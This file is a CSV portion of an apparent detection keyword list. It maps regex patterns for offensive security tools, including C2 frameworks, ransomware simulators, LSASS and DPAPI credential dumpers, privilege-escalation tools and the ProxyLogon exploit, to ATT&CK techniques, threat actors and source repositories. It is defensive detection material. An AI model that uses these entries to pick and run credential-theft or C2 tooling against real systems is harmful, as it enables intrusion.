"* pop3-ntlm-info.nse*",".{0,1000}\spop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2630"
"* popcalc.bin *",".{0,1000}\spopcalc\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","2631"
"* popcalc64.bin *",".{0,1000}\spopcalc64\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","2632"
"* PopUpRansom*",".{0,1000}\sPopUpRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","2633"
"* --port 1337*",".{0,1000}\s\-\-port\s1337.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","2634"
"* port_reuse.py*",".{0,1000}\sport_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","2635"
"* port_scan.py*",".{0,1000}\sport_scan\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2636"
"* Port-Scan.ps1*",".{0,1000}\sPort\-Scan\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","2639"
"* PortScanner.ahk*",".{0,1000}\sPortScanner\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","2640"
"* port-states.nse*",".{0,1000}\sport\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2641"
"* PoshC2 *",".{0,1000}\sPoshC2\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2642"
"* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2643"
"* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","2644"
"* PostDump.exe*",".{0,1000}\sPostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","2645"
"* PotentiallyCrackableAccounts.ps1*",".{0,1000}\sPotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2646"
"* PowerBreach.ps1*",".{0,1000}\sPowerBreach\.ps1.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","2647"
"* powercat.ps1",".{0,1000}\spowercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","2648"
"* powercat.ps1*",".{0,1000}\spowercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","2649"
"* PowerLurk.ps1*",".{0,1000}\sPowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","2650"
"* Powermad.ps1*",".{0,1000}\sPowermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","2651"
"* PowerTools.ps1*",".{0,1000}\sPowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","2652"
"* PowerUp.ps1*",".{0,1000}\sPowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2653"
"* PowerUpSQL.ps1*",".{0,1000}\sPowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","2654"
"* PowerUpSQL.ps1*",".{0,1000}\sPowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","2655"
"* powerview.py*",".{0,1000}\spowerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","2656"
"* ppid_spoofing.exe*",".{0,1000}\sppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2657"
"* PPLmedic.exe*",".{0,1000}\sPPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","2658"
"* pptp-version.nse*",".{0,1000}\spptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2659"
"* Pre2kSpray.ps1*",".{0,1000}\sPre2kSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","2660"
"* preauthscan /users:*",".{0,1000}\spreauthscan\s\/users\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","2661"
"* prepare.sh shell/mod_*.htaccess*",".{0,1000}\sprepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","#linux","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","2662"
"* --preset all -o syscalls_all*",".{0,1000}\s\-\-preset\sall\s\-o\ssyscalls_all.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","2663"
"* --preset common -o syscalls_common*",".{0,1000}\s\-\-preset\scommon\s\-o\ssyscalls_common.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","2664"
"*---------- Prince Ransomware ----------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\sPrince\sRansomware\s\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#content","N/A","10","1","N/A","N/A","N/A","N/A","2665"
"* PrincipalsAllowedToDelegateToAccount *",".{0,1000}\sPrincipalsAllowedToDelegateToAccount\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","2666"
"* PrintCreds.py*",".{0,1000}\sPrintCreds\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","2667"
"* printerbug.py*",".{0,1000}\sprinterbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2668"
"* printing the golden data, format inspired by Responder :D*",".{0,1000}\sprinting\sthe\sgolden\sdata,\sformat\sinspired\sby\sResponder\s\:D.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","2669"
"* Priv_Esc.sh*",".{0,1000}\sPriv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","2670"
"* --private-key terraform-keys reconFTW.yml*",".{0,1000}\s\-\-private\-key\sterraform\-keys\sreconFTW\.yml.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","2671"
"* --priv-esc*",".{0,1000}\s\-\-priv\-esc.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2672"
"* privesc.ps1*",".{0,1000}\sprivesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","2673"
"* PrivescCheck.ps1*",".{0,1000}\sPrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","2674"
"* Process spawned with stolen token!*",".{0,1000}\sProcess\sspawned\swith\sstolen\stoken!.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","2677"
"* processinjection.exe*",".{0,1000}\sprocessinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2678"
"* ProtectMyTooling.py*",".{0,1000}\sProtectMyTooling\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2679"
"* ProtectMyToolingGUI.py*",".{0,1000}\sProtectMyToolingGUI\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","2680"
"* proxychains *",".{0,1000}\sproxychains\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","2681"
"* proxylogon.py*",".{0,1000}\sproxylogon\.py.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","N/A","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","2682"
"* ProxyStream *Stowaway*",".{0,1000}\sProxyStream\s.{0,1000}Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","2683"
"* proxyTunnel.ps1*",".{0,1000}\sproxyTunnel\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","2684"
"* ps /target:*.xml /unprotect*",".{0,1000}\sps\s\/target\:.{0,1000}\.xml\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","2685"
"* PS1ToBase64.ps1*",".{0,1000}\sPS1ToBase64\.ps1.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","2686"
"* PS2EXE.ps1*",".{0,1000}\sPS2EXE\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Convert Powershell scripts to EXEs","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/PS2EXE","1","0","N/A","N/A","7","1","5","1","2024-08-31T12:34:50Z","2024-08-22T12:22:26Z","2687"
